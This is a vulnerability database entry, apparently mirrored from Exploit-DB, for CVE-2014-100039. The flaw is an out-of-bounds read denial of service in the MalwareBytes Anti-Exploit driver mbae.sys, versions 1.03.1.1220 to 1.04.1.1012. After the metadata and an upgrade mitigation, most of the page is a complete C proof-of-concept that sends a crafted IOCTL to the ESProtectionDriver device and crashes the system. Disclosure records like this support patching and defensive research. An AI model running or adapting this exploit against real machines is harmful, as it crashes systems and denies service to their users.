MalwareBytes Anti-Exploit Out-of-bounds Read DoS

vendor:

MalwareBytes Anti-Exploit

by:

Parvez Anwar

7.8

CVSS

HIGH

Out-of-bounds Read DoS

125

CWE

Product Name: MalwareBytes Anti-Exploit

Affected Version From: 1.03.1.1220

Affected Version To: 1.04.1.1012

Patch Exists: YES

Related CWE: CVE-2014-100039

CPE: a:malwarebytes:malwarebytes_anti-exploit

Metasploit: N/A

Other Scripts: https://www.infosecmatter.com/nessus-plugin-library/?id=83958, https://www.infosecmatter.com/nessus-plugin-library/?id=125007

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XP SP3 and Windows 7 SP1

2015

MalwareBytes Anti-Exploit Out-of-bounds Read DoS

MalwareBytes Anti-Exploit (mbae.sys) is vulnerable to an Out-of-bounds Read Denial of Service (DoS) attack. An attacker can send a specially crafted IOCTL request with a size of 0xFFFFFF00 to the vulnerable driver, which will cause the system to crash. This vulnerability affects 32bit Windows XP SP3 and Windows 7 SP1 systems running MalwareBytes Anti-Exploit version 1.03.1.1220 and 1.04.1.1012.

Mitigation:

Upgrade to MalwareBytes Anti-Exploit version 1.05 or later.

Source

Exploit-DB raw data:

/*

Exploit Title    - MalwareBytes Anti-Exploit Out-of-bounds Read DoS
Date             - 19th January 2015
Discovered by    - Parvez Anwar (@parvezghh)
Vendor Homepage  - https://www.malwarebytes.org
Tested Version   - 1.03.1.1220, 1.04.1.1012
Driver Version   - no version set - mbae.sys
Tested on OS     - 32bit Windows XP SP3 and Windows 7 SP1
OSVDB            - http://www.osvdb.org/show/osvdb/114249
CVE ID           - CVE-2014-100039
Vendor fix url   - https://forums.malwarebytes.org/index.php?/topic/158251-malwarebytes-anti-exploit-hall-of-fame/
Fixed version    - 1.05
Fixed driver ver - no version set

*/



#include <stdio.h>
#include <windows.h>

#define BUFSIZE 25


int main(int argc, char *argv[]) 
{
    HANDLE         hDevice;
    char           devhandle[MAX_PATH];
    DWORD          dwRetBytes = 0;
    BYTE           sizebytes[4] = "\xff\xff\xff\x00";   
    BYTE           *inbuffer;


    printf("-------------------------------------------------------------------------------\n");
    printf("        MalwareBytes Anti-Exploit (mbae.sys) Out-of-bounds Read DoS            \n");
    printf("             Tested on Windows XP SP3/Windows 7 SP1 (32bit)                    \n");
    printf("-------------------------------------------------------------------------------\n\n");

    sprintf(devhandle, "\\\\.\\%s", "ESProtectionDriver");

    inbuffer = VirtualAlloc(NULL, BUFSIZE, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);

    memset(inbuffer, 0x41, BUFSIZE);
    memcpy(inbuffer, sizebytes, sizeof(sizebytes));

    printf("\n[i] Size of total buffer being sent %d bytes", BUFSIZE);

    hDevice = CreateFile(devhandle, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING , 0, NULL);
    
    if(hDevice == INVALID_HANDLE_VALUE)
    {
        printf("\n[-] Open %s device failed\n\n", devhandle);
        return -1;
    }
    else 
    {
        printf("\n[+] Open %s device successful", devhandle);
    }	

    printf("\n[~] Press any key to DoS . . .");
    getch();

    DeviceIoControl(hDevice, 0x0022e000, inbuffer, BUFSIZE, NULL, 0, &dwRetBytes, NULL);

    printf("\n[+] DoS buffer sent\n\n");
 
    CloseHandle(hDevice);

    return 0;
}